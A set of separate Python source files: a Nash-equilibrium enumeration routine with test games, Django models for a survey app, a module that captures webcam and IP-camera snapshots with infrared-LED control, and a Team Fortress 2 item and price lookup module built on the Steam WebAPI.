    # NOTE: constraints i >= m are indexed via i % n; over the consecutive
    # range [m, m+n) this is a fixed permutation of player 2's strategies and
    # the same mapping is used for Q below, so the labeling stays consistent.
    P = {}
    # Create matrices and vectors representing Player 1's polytope boundary constraints
    identity = np.identity(m, dtype=int)
    zeros_vector = np.zeros((m, 1), dtype=int)
    ones_vector = np.ones((n, 1), dtype=int)
    # For all m-combinations of the number of polytope boundary constraints,
    for rows in combinations(range(m + n), m):
        A = np.array([identity[i, :] if i < m else payoff_matrix_p2.transpose()[i % n, :] for i in rows])
        b = np.array([zeros_vector[i, :] if i < m else ones_vector[i % n, :] for i in rows])
        # Try solving matrix equation Ax = b using LU decomposition method
        try:
            x = np.linalg.solve(A, b)
        # -- if that fails, then x cannot be a vertex
        # (BUGFIX: np.linalg.linalg was removed in NumPy 2.0)
        except np.linalg.LinAlgError:
            continue
        # Verify that mixed strategy vector x is a vertex of the polytope
        if all(np.dot(payoff_matrix_p2.transpose(), x.flatten()) <= 1) and \
                all(np.dot(identity, x.flatten()) >= 0) and \
                not all(x == 0):
            P[rows] = x / np.sum(x)
    # 3. Find all vertices of player 2's polytope (denote by Q; key=labels)
    Q = {}
    # Create matrices and vectors representing Player 2's polytope boundary constraints
    # if the number of pure strategies is different between the players
    if n != m:
        identity = np.identity(n, dtype=int)
        zeros_vector = np.zeros((n, 1), dtype=int)
        ones_vector = np.ones((m, 1), dtype=int)
    # For all n-combinations of the number of polytope boundary constraints,
    for rows in combinations(range(n + m), n):
        A = np.array([payoff_matrix_p1[i, :] if i < m else identity[i % n, :] for i in rows])
        b = np.array([ones_vector[i, :] if i < m else zeros_vector[i % n, :] for i in rows])
        # Try solving matrix equation Ay = b using LU decomposition method
        try:
            y = np.linalg.solve(A, b)
        # -- if that fails, then y cannot be a vertex
        except np.linalg.LinAlgError:
            continue
        # Verify that mixed strategy vector y is a vertex of the polytope
        if all(np.dot(payoff_matrix_p1, y.flatten()) <= 1) and \
                all(np.dot(identity, y.flatten()) >= 0) and \
                not all(y == 0):
            Q[rows] = y / np.sum(y)
    # 4. For each (x, y), if the pair is completely labeled, then (x, y) is an NE
    msne = [(P[x_labels], Q[y_labels]) for y_labels in Q for x_labels in P
            if len(set(list(x_labels) + list(y_labels))) == (m + n)]
    return msne
if __name__ == '__main__':
    # Each scenario: (label, payoff matrix of p1, payoff matrix of p2,
    # expected analytical MSNE). Both algorithms are run on every scenario.
    scenarios = []
    ### Test scenario1: Equation 3.3 Nisan et al. book
    p1 = np.array([[3, 3], [2, 5], [0, 6]], dtype=int)
    p2 = np.array([[3, 2], [2, 6], [3, 1]], dtype=int)
    scenarios.append(("Equation 3.3", p1, p2,
                      [((1.0, .0, .0), (1.0, .0)),
                       ((.8, .2, .0), (2/3, 1/3)),
                       ((.0, 1/3, 2/3), (1/3, 2/3))]))
    ### Test scenario2: Matching Pennies
    p1 = np.array([[-1, 1], [1, -1]], dtype=int)
    p2 = np.array([[1, -1], [-1, 1]], dtype=int)
    scenarios.append(("Matching Pennies", p1, p2,
                      [((.5, .5), (.5, .5))]))
    ### Test scenario3: Example 2.2 Nisan et al. book (symmetric: p2 = p1^T)
    p1 = np.array([[0, 3, 0], [0, 0, 3], [2, 2, 2]], dtype=int)
    scenarios.append(("Example 2.2", p1, p1.transpose(),
                      [((.0, 1/3, 2/3), (.0, 1/3, 2/3)),
                       ((.0, 2/3, 1/3), (1/3, .0, 2/3)),
                       ((1/3, .0, 2/3), (.0, 2/3, 1/3))]))
    ### Test scenario4: Rock-Paper-Scissors game
    p1 = np.array([[0, -1, 1], [1, 0, -1], [-1, 1, 0]], dtype=int)
    p2 = np.array([[0, 1, -1], [-1, 0, 1], [1, -1, 0]], dtype=int)
    scenarios.append(("Rock-Paper-Scissors", p1, p2,
                      [((1/3, 1/3, 1/3), (1/3, 1/3, 1/3))]))
    ### Test scenario5: Equation 3.7 Nisan et al. book (symmetric: p2 = p1^T)
    p1 = np.array([[3, 3, 0], [4, 0, 1], [0, 4, 5]], dtype=int)
    scenarios.append(("Equation 3.7", p1, p1.transpose(),
                      [((.0, .0, 1.0), (.0, .0, 1.0)),
                       ((.75, .25, .0), (.75, .25, .0)),
                       ((.5, .25, .25), (.5, .25, .25))]))
    # Find MSNE using both algorithms and compare with the expected result
    for label, pm1, pm2, expected in scenarios:
        msne = support_enumeration(pm1, pm2)
        _test(msne, expected, description=label + "/support")
        msne = vertex_enumeration(pm1, pm2)
        _test(msne, expected, description=label + "/vertex")
|
|
"""Survey Models
"""
import datetime
from django.db import models
from django.conf import settings
from django.core.cache import cache
from django.utils import encoding
from django.template.defaultfilters import date as datefilter
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
# (code, label) pairs for Question.qtype: which form widget renders the
# question on the public site.
QTYPE_CHOICES = (
    ('T', 'Text Input'),
    ('A', 'Text Area'),
    ('S', 'Select One Choice'),
    ('R', 'Radio List'),
    ('I', 'Radio Image List'),
    ('C', 'Checkbox List')
)
class SurveyManager(models.Manager):
    """Manager adding recipient-based lookups for surveys."""

    def surveys_for(self, recipient):
        """Return the visible surveys attached to *recipient* through the
        generic foreign key."""
        ctype = ContentType.objects.get_for_model(recipient)
        return Survey.objects.filter(visible=True,
                                     recipient_type=ctype,
                                     recipient_id=recipient.id)
class Survey(models.Model):
    """A questionnaire accepting submissions between ``opens`` and
    ``closes``, optionally attached to an arbitrary recipient object via a
    generic foreign key. The open/closed flag is cached (see ``open``)."""
    title = models.CharField(_('survey title'), max_length=80)
    slug = models.SlugField(_('slug'), unique=True)
    description = models.TextField(verbose_name=_("description"),
        help_text=_("This field appears on the public web site and should give an overview to the interviewee"),
        blank=True)
    ## Add validation on datetimes
    opens = models.DateTimeField(_('survey starts accepting submissions on'))
    closes = models.DateTimeField(_('survey stops accepting submissions on'))
    # Define the behavior of the survey
    visible = models.BooleanField(_('survey is visible'))
    public = models.BooleanField(_('survey results are public'))
    restricted = models.BooleanField(verbose_name=_("restrict the survey to authentified user"),
                                     blank=True, default=False)
    allows_multiple_interviews = models.BooleanField(verbose_name=_("allows multiple interviews"),
                                                     blank=True, default=True)
    template_name = models.CharField(_('template name'), max_length=150,
        null=True, blank=True,
        help_text=_("This field is used to define a custom template (Example: 'dj_survey/template/my_add_interview_forms.html')."))
    # Control who can edit the survey
    # TODO: Plug this control in the view used to edit the survey
    created_by = models.ForeignKey(User, related_name="created_surveys")
    editable_by = models.ForeignKey(User, related_name="owned_surveys")
    # Integration in Pinax
    recipient_type = models.ForeignKey(ContentType, null=True)
    recipient_id = models.PositiveIntegerField(null=True)
    recipient = generic.GenericForeignKey('recipient_type', 'recipient_id')

    objects = SurveyManager()

    @property
    def _cache_name(self):
        # Cache key for the open/closed flag; unsaved surveys share 'new'.
        if not self.id:
            id = 'new'
        else:
            id = int(self.id)
        return 'survey_' + repr(id) + '_status'

    @property
    def open(self):
        """True when the survey is visible and currently accepts
        submissions. The flag is cached until the next state transition."""
        if not self.visible:
            return False
        value = cache.get(self._cache_name)
        if value is not None:
            return value
        now = datetime.datetime.now()
        if self.opens >= now:
            # Not open yet: cache the negative answer until opening time.
            # BUGFIX: the original cached for (now - opens), a negative
            # timedelta, instead of the time remaining until opening.
            value = False
            duration = (self.opens - now).seconds
        elif self.closes >= now:
            # Currently open: cache the positive answer until closing time.
            # BUGFIX: the original used (opens - now) here instead of the
            # time remaining until closing.
            value = True
            duration = (self.closes - now).seconds
        else:
            # Closed for good: cache for a month.
            value = False
            duration = 60 * 60 * 24 * 31
        # NOTE: timedelta.seconds ignores whole days, so the cache may
        # expire early for windows longer than a day -- harmless, the value
        # is then simply recomputed.
        if duration:
            cache.set(self._cache_name, value, duration)
        return value

    @property
    def closed(self):
        """Convenience inverse of ``open``."""
        return not self.open

    @property
    def status(self):
        """Human-readable state: 'private', 'open', 'opens <date>' or
        'closed'."""
        if not self.visible:
            return _('private')
        if self.open:
            return _('open')
        # BUGFIX: ``datetime`` here is the module, so the original call
        # ``datetime.now()`` raised AttributeError.
        if datetime.datetime.now() < self.opens:
            return unicode(_('opens ')) + datefilter(self.opens)
        return _('closed')

    @property
    def answer_count(self):
        """Total number of answers across all questions (memoized)."""
        if hasattr(self, '_answer_count'):
            return self._answer_count
        self._answer_count = sum(q.answer_count for q in self.questions.iterator())
        return self._answer_count

    @property
    def interview_count(self):
        """Number of distinct interviews, counted by UUID (memoized)."""
        # NOTSURE: Do we realy need this optimisation?
        if hasattr(self, '_interview_count'):
            return self._interview_count
        self._interview_count = len(Answer.objects.filter(
            question__survey=self.id).values('interview_uuid').distinct())
        return self._interview_count

    @property
    def session_key_count(self):
        """Number of distinct sessions that submitted answers (memoized)."""
        # BUGFIX: the original checked ``_session_key_count`` but stored the
        # result under ``_submission_count``, so the memoization never hit.
        if hasattr(self, '_session_key_count'):
            return self._session_key_count
        self._session_key_count = len(Answer.objects.filter(
            question__survey=self.id).values('session_key').distinct())
        return self._session_key_count

    def has_answers_from(self, session_key):
        """True when the given session already answered this survey."""
        return bool(
            Answer.objects.filter(session_key__exact=session_key.lower(),
                                  question__survey__id__exact=self.id).distinct().count())

    def has_answers_from_user(self, user):
        """True when the given user already answered this survey."""
        return bool(
            Answer.objects.filter(user=user,
                                  question__survey__id__exact=self.id).distinct().count())

    def __unicode__(self):
        return u' - '.join([self.slug, self.title])

    @models.permalink
    def get_absolute_url(self):
        return ('survey-detail', (), {'survey_slug': self.slug})

    def save(self, *args, **kwargs):
        """Save the survey and drop the cached open/closed flag."""
        # BUGFIX: forward *args/**kwargs so callers may pass Django save
        # options (e.g. force_insert) as with any other model.
        res = super(Survey, self).save(*args, **kwargs)
        cache.delete(self._cache_name)
        return res

    def answers_viewable_by(self, user):
        """True when *user* is allowed to see this survey's answers."""
        if not self.visible:
            return False
        if self.public:
            return True
        if user.is_anonymous():
            return False
        return user.has_perm('survey.view_answers')
class Question(models.Model):
    """One question of a Survey; ``qtype`` selects the rendering widget."""
    survey = models.ForeignKey(Survey, related_name='questions',
                               verbose_name=_('survey'))
    # Widget type; one of QTYPE_CHOICES
    qtype = models.CharField(_('question type'), max_length=2,
                             choices=QTYPE_CHOICES)
    required = models.BooleanField(_('required'), default=True)
    text = models.TextField(_('question text'))
    order = models.IntegerField(verbose_name = _("order"),
                                null=True, blank=True)
    # TODO: Add a button or check box to remove the file. There are several
    # recipes floating on internet. I like the one with a custom widget
    image = models.ImageField(verbose_name=_("image"),
                              upload_to= "survey/images/questions" + "/%Y/%m/%d/",
                              null=True, blank= True)
    # Define if the user must select at least 'choice_num_min' number of
    # choices and at most 'choice_num_max'
    choice_num_min = models.IntegerField(_("minimum number of choices"),
                                         null=True, blank=True,)
    choice_num_max = models.IntegerField(_("maximum number of choices"),
                                         null=True, blank=True,)
    # TODO: Modify the forms to respect the style defined by this attr (html,css)
    qstyle = models.TextField(_("Html Style"),null=True, blank=True)

    ## model validation for requiring choices.

    @property
    def answer_count(self):
        """Number of answers given to this question (memoized per instance)."""
        if hasattr(self, '_answer_count'):
            return self._answer_count
        self._answer_count = self.answers.count()
        return self._answer_count

    def __unicode__(self):
        return u' - '.join([self.survey.slug, self.text])

    class Meta:
        unique_together = (('survey', 'text'),)
        # NOTE(review): recent Django versions treat order_with_respect_to
        # and ordering as mutually exclusive -- confirm this pair still
        # validates on the Django release in use.
        order_with_respect_to='survey'
        ordering = ('survey', 'order')

    class Admin:
        list_select_related = True
        list_filter = ('survey', 'qtype')
        list_display_links = ('text',)
        list_display = ('survey', 'text', 'qtype', 'required')
        search_fields = ('text',)

    @models.permalink
    def get_update_url(self):
        """URL of the edit view for this question."""
        return ('question-update', (), {'survey_slug': self.survey.slug,'question_id' :self.id })

    # TODO: add this a fallback to this optimisation with django ORM.
    @property
    def choice_count(self):
        """Number of choices attached to this question."""
        return self.choices.count()
class Choice(models.Model):
    """One selectable option of a multiple-choice Question."""
    ## validate question is of proper qtype
    question = models.ForeignKey(Question, related_name='choices',
                                 verbose_name=_('question'))
    text = models.CharField(_('choice text'), max_length=500)
    # TODO: Add a button or check box to remove the file. There are several
    # recipes floating on internet. I like the one with a custom widget
    image = models.ImageField(verbose_name = _("image"),
                              upload_to= "survey/images/questions" + "/%Y/%m/%d/",
                              null=True ,blank= True)
    order = models.IntegerField(verbose_name = _("order"),
                                null=True, blank=True)

    @models.permalink
    def get_update_url(self):
        """URL of the edit view for this choice."""
        return ('choice-update', (), {'question_id': self.question.id,'choice_id' :self.id })

    @property
    def count(self):
        """Number of answers whose text matches this choice (memoized).

        NOTE(review): answers are matched by exact text, so editing a
        choice's text orphans its previous answers -- confirm intended.
        """
        if hasattr(self, '_count'):
            return self._count
        self._count = Answer.objects.filter(question=self.question_id,
                                            text=self.text).count()
        return self._count

    def __unicode__(self):
        return self.text

    class Meta:
        unique_together = (('question', 'text'),)
        order_with_respect_to='question'
        ordering = ('question', 'order')
class Answer(models.Model):
    """A single response to one question within an interview."""
    user = models.ForeignKey(User, related_name='answers',
                             verbose_name=_('user'), editable=False,
                             blank=True,null=True)
    question = models.ForeignKey(Question, related_name='answers',
                                 verbose_name=_('question'),
                                 editable=False)
    ## sessions expire, survey results do not, so keep the key.
    session_key = models.CharField(_('session key'), max_length=40)
    text = models.TextField(_('answer text'))
    # auto_now: the timestamp is refreshed on every save
    submission_date = models.DateTimeField(auto_now=True)
    # UUID is used to calculate the number of interviews
    interview_uuid = models.CharField(_("Interview unique identifier"),max_length=36)

    class Meta:
        # unique_together = (('question', 'session_key'),)
        permissions = (("view_answers", "Can view survey answers"),
                       ("view_submissions", "Can view survey submissions"))
|
|
#!/usr/bin/env python
# The MIT License (MIT)
#
# Copyright (c) 2015 Corrado Ubezio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Capturing a single image from webcam
In Linux there are the following methods:
METHOD 1: RTSP protocol
avconv -i rtsp://<user>:<pass>@<local_ip>:<port>/video.mjpg -vframes 1 -r 1 -s 640x480 image.jpg
METHOD 2: HTTP protocol
avconv -i http://<user>:<pass>@<local_ip>:<port>/video.mjpg -vframes 1 -r 1 -s 640x480 image.jpg
METHOD 3: If the camera is smart enough, it is possible to send an http request to take a snapshot
wget --tries=2 --timeout=10 http://<user>:<pass>@<local_ip>:<port>/cgi-bin/jpg/image -O snapshot.jpg
See also: Link: http://stackoverflow.com/a/11094891
"""
from __future__ import print_function
from requests import get, post
from time import sleep
from sys import stderr
'''In dark image detection, compare 'light' pixels with 'dark' ones.'''
# Sentinel: any threshold <= this value requests the automatic
# dark-vs-light pixel-count comparison instead of a fixed threshold.
LIGHT_THRESHOLD_DEFAULT = -1
def cv2_gshistogram(imageAsByteArray):
    '''Compute the grayscale histogram of an image byte buffer using OpenCV.

    The buffer is decoded directly to a single-band (grayscale) image, so
    the returned histogram holds 256 pixel counts, one for each shade of
    grey in the source image.
    '''
    from cv2 import calcHist, imdecode, IMREAD_GRAYSCALE
    from numpy import frombuffer, uint8
    raw = frombuffer(imageAsByteArray, dtype=uint8)
    grayscale = imdecode(raw, IMREAD_GRAYSCALE)
    return calcHist([grayscale], [0], None, [256], [0, 256])
def pil_gshistogram(imageAsByteArray):
    '''Use Pillow to convert the bytearray image buffer to grayscale and
    return the histogram as a list of pixel counts,
    one for each pixel value in the source image.
    Since the source image has been converted to one only band (grayscale),
    there are 256 pixel counts, that is an index for each shade of grey.
    '''
    from PIL import Image
    from io import BytesIO
    # BUGFIX: the buffer holds binary JPEG data, so wrap it in io.BytesIO.
    # The former StringIO.StringIO is a Python-2-only *text* buffer and the
    # import fails outright on Python 3.
    # see: https://stackoverflow.com/a/24997383
    img = Image.open(BytesIO(imageAsByteArray))
    # Convert to greyscale and return the pixel counts list
    grayimg = img.convert(mode='L')
    return grayimg.histogram()
def isDarkImage(imageAsBytearray, lightThreshold=LIGHT_THRESHOLD_DEFAULT):
    '''Return True if in the grayscale histogram of the image there are
    fewer 'light' pixels than 'dark' ones.
    If lightThreshold is supplied then 'light' pixels are compared with it.
    In a grayscale histogram, the first 128 values are 'dark' pixels,
    the last 128 are 'light' pixels.
    See: https://stackoverflow.com/a/8659785
    '''
    pixel_counts = pil_gshistogram(imageAsBytearray)
    indexes = len(pixel_counts)  # should be 256 (an index for each shade of grey)
    # BUGFIX: use floor division; under Python 3 `indexes / 2` is a float
    # and floats are not valid slice bounds.
    midpoint = indexes // 2
    light_pixels = sum(pixel_counts[midpoint:])
    if lightThreshold <= LIGHT_THRESHOLD_DEFAULT:
        # No explicit threshold: compare against the dark-pixel count.
        lightThreshold = sum(pixel_counts[:midpoint])
    return light_pixels <= lightThreshold
def lightsIP(cameraUrl, username, password, switchOn):
    '''Switch IR leds on/off.
    See night vision mode on/off for D-Link DCS-932L IP Camera
    link: http://forums.ispyconnect.com/forum.aspx?g=posts&t=1151
    Returns bool: True when the camera acknowledged the change.
    '''
    payload = {"IRLed":"1"} if switchOn is True else {"IRLed":"0"}
    try:
        response = post(cameraUrl, auth=(username, password), data=payload)
    except Exception:
        # TODO: better to handle exceptions as in:
        # http://docs.python-requests.org/en/latest/user/quickstart/#errors-and-exceptions
        return False
    # 204: the server has successfully fulfilled the request and there is
    # no additional content.
    return response.status_code == 204
def grabImageFromIP(cameraUrl, username, password):
    '''Grab a snapshot from the IP camera referenced by its URL.
    See: http://stackoverflow.com/a/13137873
    Returns bool, JPEG bytearray.
    '''
    try:
        response = get(cameraUrl, auth=(username, password), timeout=10, stream=True)
    except Exception:
        # TODO: better to handle exceptions as in:
        # http://docs.python-requests.org/en/latest/user/quickstart/#errors-and-exceptions
        return False, None
    if response.status_code != 200:
        return False, None
    # Stream the body in 1 KiB chunks and assemble the JPEG buffer.
    jpgImage = b"".join(response.iter_content(1024))
    if len(jpgImage) == 0:
        return False, None
    return True, jpgImage
def grabImageFromUSB(cameraNumber=0):
    '''Grab a snapshot from the specified USB camera.
    Returns bool, video frame encoded as a JPEG bytearray.
    '''
    from cv2 import VideoCapture, imencode
    # initialize the camera
    cam = VideoCapture(cameraNumber)
    try:
        retVal, rawData = cam.read()
        if not retVal:
            # frame capture returned errors
            return False, None
        retVal, jpgData = imencode('.jpg', rawData)
        if not retVal:
            # image encode errors
            return False, None
        return retVal, bytearray(jpgData)
    finally:
        # BUGFIX: release the capture device on every path; the original
        # leaked the camera handle.
        cam.release()
def grabImage(cameraDesc):
    '''Wraps grabImageFromIP and grabImageFromUSB.
    The camera type (usb or ip) is taken from the descriptor's 'source'
    entry ("usb://<number>" or "http://<address>").
    Returns bool, JPEG bytearray; (False, b"") for unknown protocols.
    '''
    retval = False
    jpgImage = b""
    camProtAndAddr = cameraDesc['source'].split('://')
    if camProtAndAddr[0] == 'usb':
        # BUGFIX: parse the camera number with int() instead of eval(),
        # which would execute arbitrary code taken from the descriptor.
        retval, jpgImage = grabImageFromUSB(int(camProtAndAddr[1]))
    elif camProtAndAddr[0] == 'http':
        retval, jpgImage = grabImageFromIP(cameraDesc['source'],
                                           cameraDesc['optional-auth']['user-name'],
                                           cameraDesc['optional-auth']['password'])
    return retval, jpgImage
def imageCapture(cameraDesc, imageFileName):
    '''Saves a snapshot from a camera to the specified file.
    If the camera has night vision capability, use IR leds; and if a
    threshold is given, first take an image with night vision off and, if it
    is too dark compared to the threshold, shoot again with the IR leds ON.
    The camera type (usb or ip) is taken from the descriptor:
    cameraDesc = {
        "optional-irled": {
            "url-ctrl" : "<camera_irled_ctrl_protocol_and_address>",
            "opt-light-threshold" : "<threshold_light_pixels>"
        },
        "optional-auth": {
            "user-name" : "<camera_user>",
            "password": "<camera_user_password>"
        },
        "source": "<camera_protocol_and_address>"
    }
    Returns bool
    '''
    applyNightVision = False
    # Check night vision capability
    try:
        irLed_ctrl_url = cameraDesc['optional-irled']['url-ctrl']
    except KeyError:
        irLed_ctrl_url = None
    if irLed_ctrl_url:
        # the camera has night vision capability: default to using it
        # unless the threshold probe below decides otherwise
        applyNightVision = True
        # credentials are optional; fall back to empty strings
        try:
            username = cameraDesc['optional-auth']['user-name']
            password = cameraDesc['optional-auth']['password']
        except KeyError:
            username = ''
            password = ''
        # check threshold capability
        try:
            threshold = cameraDesc['optional-irled']['opt-light-threshold']
        except KeyError:
            threshold = None
        if threshold:
            try:
                threshold = int(threshold)
            except ValueError:
                # unparsable threshold: fall back to the automatic
                # dark-vs-light comparison in isDarkImage
                threshold = LIGHT_THRESHOLD_DEFAULT
        if threshold:
            # first take an image with night vision off
            grabOk, jpgImage = grabImage(cameraDesc)
            if not grabOk:
                # grabImage returns errors
                return False
            # and then compare with threshold: only turn on the IR leds
            # when the probe shot came out dark
            if isDarkImage(jpgImage, threshold):
                applyNightVision = True
                print('Recover a Dark Image', file=stderr)
            else:
                applyNightVision = False
    # switch IrLeds ON
    if applyNightVision:
        irLedOk = lightsIP(irLed_ctrl_url, username, password, True)
        if irLedOk is False:
            # TODO check the result
            print('FAIL to switch IrLeds ON', file=stderr)
        else:
            # wait for IrLeds settling
            sleep(4)
    # take the image
    grabOk, jpgImage = grabImage(cameraDesc)
    # switch IrLeds OFF (before checking the grab result, so the leds are
    # not left on when the capture failed)
    if applyNightVision:
        irLedOk = lightsIP(irLed_ctrl_url, username, password, False)
        if irLedOk is False:
            # TODO check the result
            print('FAIL to switch IrLeds OFF', file=stderr)
    if not grabOk:
        # grabImage returns errors
        return False
    # save the image
    retVal = True
    try:
        with open(imageFileName, 'wb') as f:
            f.write(jpgImage)
    except IOError:
        retVal = False
    return retVal
if __name__ == "__main__":
    # Library module: no standalone command-line behavior is defined.
    pass
|
|
"""This module is based on the Steam WebAPI and can be used to get information
about items in TF2. Using this module, you can obtain the item schema,
store prices, bundles, item sets and attributes for TF2.
You can also obtain market prices from backpack.tf.
There are also functions for parsing the information of each item.
"""
import asyncio
import json
from collections import defaultdict, OrderedDict
import aiohttp
async def getschema(apikey):
    """Return the schema (overview merged with the paginated item list)."""
    # Fetch the overview concurrently while paging through the items.
    overview_task = asyncio.ensure_future(_getschemaoverview(apikey))
    all_items = []
    start = 0
    # The items endpoint is paginated; follow the 'next' cursor until done.
    while start is not None:
        page, start = await _getschemaitems(apikey, start)
        all_items.extend(page)
    schema = await overview_task
    schema['result']['items'] = all_items
    return schema
async def _getschemaoverview(apikey):
    """Fetch the schema overview (qualities, attributes, particles, ...)."""
    url = ('https://api.steampowered.com/IEconItems_440/GetSchemaOverview/v1/'
           '?key={}&language=en'.format(apikey))
    return await _getjsonresponse(url)
async def _getschemaitems(apikey, start):
    """Fetch one page of schema items; return (items, next_start)."""
    url = ('https://api.steampowered.com/IEconItems_440/GetSchemaItems/v1/'
           '?key={}&language=en&start={}'.format(apikey, start))
    payload = (await _getjsonresponse(url))['result']
    # 'next' is absent on the last page, yielding None to stop the caller.
    return payload['items'], payload.get('next')
async def getitemsinfo(apikey, storeprices, indexes):
    """Return a dictionary of AssetClassInfo values with defindex as key"""
    url = ('https://api.steampowered.com/ISteamEconomy/GetAssetClassInfo/v0001/'
           '?key={0}&language=en&appid=440&class_count={1}'.format(apikey,
                                                                   len(indexes)))
    # Append one classidN parameter per requested defindex.
    url += ''.join('&classid{0}={1}'.format(n, storeprices[index]['classid'])
                   for n, index in enumerate(indexes))
    infobyid = (await _getjsonresponse(url))['result']
    # Drop the API status flag; the rest of the keys are class ids.
    del infobyid['success']
    return {int(iteminfo['app_data']['def_index']): iteminfo
            for iteminfo in infobyid.values()}
async def getbundles(apikey, storeprices):
    """Return a dictionary of store bundles with defindex as key"""
    bundle_tags = {'Bundles', 'Class_Bundles'}
    # Keep only the store entries tagged as (class) bundles.
    indexes = [index for index, price in storeprices.items()
               if bundle_tags.intersection(price['tags'])]
    return await getitemsinfo(apikey, storeprices, indexes)
def getitemsets(schema):
    """Return an ordered dictionary of itemsets with 'name' as key"""
    itemsets = OrderedDict()
    for itemset in schema['result']['item_sets']:
        itemsets[itemset['name']] = itemset
    return itemsets
def getitems(schema):
    """Return an ordered dictionary of items in the schema where the key is
    defindex for each item"""
    items = OrderedDict()
    for item in schema['result']['items']:
        items[item['defindex']] = item
    return items
def getitemsbyname(schema):
    """Return an ordered dictionary of items in the schema where the key is
    item_name for each item"""
    itemsbyname = OrderedDict()
    duplicates = getobsoleteindexes()
    for item in schema['result']['items']:
        name = item['item_name']
        # Keep only the first occurrence of a name, skipping obsolete
        # defindexes so the surviving entry is the current item.
        if name not in itemsbyname and item['defindex'] not in duplicates:
            itemsbyname[name] = item
    return itemsbyname
def getattributes(schema):
    """Return a dictionary with each attribute's name as key"""
    attributes = schema['result']['attributes']
    return dict((attribute['name'], attribute) for attribute in attributes)
def getparticleeffects(schema):
    """Return a dictionary with each particle effect's id as key"""
    effects = schema['result']['attribute_controlled_attached_particles']
    return dict((effect['id'], effect) for effect in effects)
async def getstoreprices(apikey):
    """Return a dictionary of store prices where the key is defindex for
    each item"""
    # BUGFIX: the query string had been mojibake'd -- '&curren' (the HTML
    # entity for the currency sign) collapsed into the single character
    # '¤', producing '¤cy=usd'. Restore the intended '&currency=usd'.
    url = ('https://api.steampowered.com/ISteamEconomy/GetAssetPrices/v0001/'
           '?key={}&language=en&appid=440&currency=usd'.format(apikey))
    prices = (await _getjsonresponse(url))['result']['assets']
    return {int(price['name']): price for price in prices}
def getnewstoreprices(storeprices):
    """Return a dictionary of store prices of new items with defindex as key"""
    newprices = {}
    for index, price in storeprices.items():
        if 'New' in price['tags']:
            newprices[index] = price
    return newprices
async def getbackpackprices(apikey, items, itemsbyname):
    """Get market prices from backpack.tf.
    Return a dictionary where the key is defindex and value is a dictionary of
    prices for the item"""
    url = ('https://backpack.tf/api/IGetPrices/v4/'
           '?key={}&compress=1'.format(apikey))
    pricesdata = (await _getjsonresponse(url))['response']['items']
    # defindex -> {quality name: formatted price string}
    pricesdict = defaultdict(dict)
    qualities = getallqualities()
    # backpack.tf currency codes -> display denominations
    denoms = {'metal': 'Refined', 'hat': 'Hat', 'keys': 'Key', 'usd': 'USD'}
    for name, iteminfo in pricesdata.items():
        # Skip items the schema does not know about.
        if name not in itemsbyname:
            continue
        index = itemsbyname[name]['defindex']
        item = items[index]
        # Crates share one name across series; the series number is stored in
        # the first schema attribute and selects the per-series price below.
        iscrate = False
        if 'attributes' in item and item['attributes']:
            attribute = item['attributes'][0]
            if attribute['name'] == 'set supply crate series':
                iscrate = True
                crateno = str(attribute['value'])
        if 'prices' not in iteminfo:
            continue
        for quality, tradeinfo in iteminfo['prices'].items():
            try:
                # Quality keys arrive as strings; unknown ids are skipped.
                qualityname = qualities[int(quality)]
            except KeyError:
                continue
            for tradable, craftinfo in tradeinfo.items():
                # Ignore non-tradable version if there is a tradable one
                if tradable == 'Non-Tradable' and 'Tradable' in tradeinfo:
                    continue
                for craftable, price in craftinfo.items():
                    # Price is either a one-element list or a dict keyed by
                    # crate series / priceindex ('0' for plain items).
                    if type(price) is list:
                        price = price[0]
                    else:
                        if iscrate and crateno in price:
                            price = price[crateno]
                        elif '0' in price:
                            price = price['0']
                        else:
                            continue
                    if not price['value']:
                        continue
                    value = price['value']
                    # Optional upper bound of a price range.
                    valuehigh = (' - {:g}'.format(price['value_high'])
                                 if 'value_high' in price else '')
                    denom = denoms[price['currency']]
                    # Pluralize countable denominations ('Keys', 'Hats').
                    if (value != 1 or valuehigh) and denom not in ('Refined',
                                                                  'USD'):
                        denom += 's'
                    qlty = (qualityname if craftable != 'Non-Craftable'
                            else 'Uncraftable')
                    pricesdict[index][qlty] = '{:g}{} {}'.format(
                        value, valuehigh, denom)
    return pricesdict
def getweapontags():
    """Return all weapon tags"""
    slots = ('primary', 'secondary', 'melee', 'pda', 'pda2', 'building')
    return slots
def getalltags():
    """Return all item tags"""
    general = ('weapon', 'cosmetic', 'hat', 'misc', 'taunt', 'tool', 'action',
               'paint', 'craft', 'token', 'bundle', 'tournament', 'halloween')
    return general + getweapontags()
def getallclasses():
    """Return an OrderedDict of TF2 classes with name as key and
    a list of aliases as value"""
    classes = OrderedDict()
    classes['Scout'] = ['Scoot']
    classes['Soldier'] = ['Solly']
    classes['Pyro'] = []
    classes['Demoman'] = ['Demo']
    classes['Heavy'] = ['Hoovy']
    classes['Engineer'] = ['Engi', 'Engie']
    classes['Medic'] = []
    classes['Sniper'] = []
    classes['Spy'] = []
    return classes
def getallqualities():
    """Return a dictionary of TF2 item qualities with number as key and
    description as value"""
    pairs = ((6, 'Unique'),
             (3, 'Vintage'),
             (11, 'Strange'),
             (1, 'Genuine'),
             (14, "Collector's"),
             (13, 'Haunted'),
             (5, 'Unusual'))
    return dict(pairs)
def getalldenoms():
    """Return an OrderedDict of price denominations in descending order with
    the defindex of their corresponding items as value"""
    denoms = OrderedDict()
    denoms['Key'] = 5021
    denoms['Refined'] = 5002
    denoms['Reclaimed'] = 5001
    denoms['Scrap'] = 5000
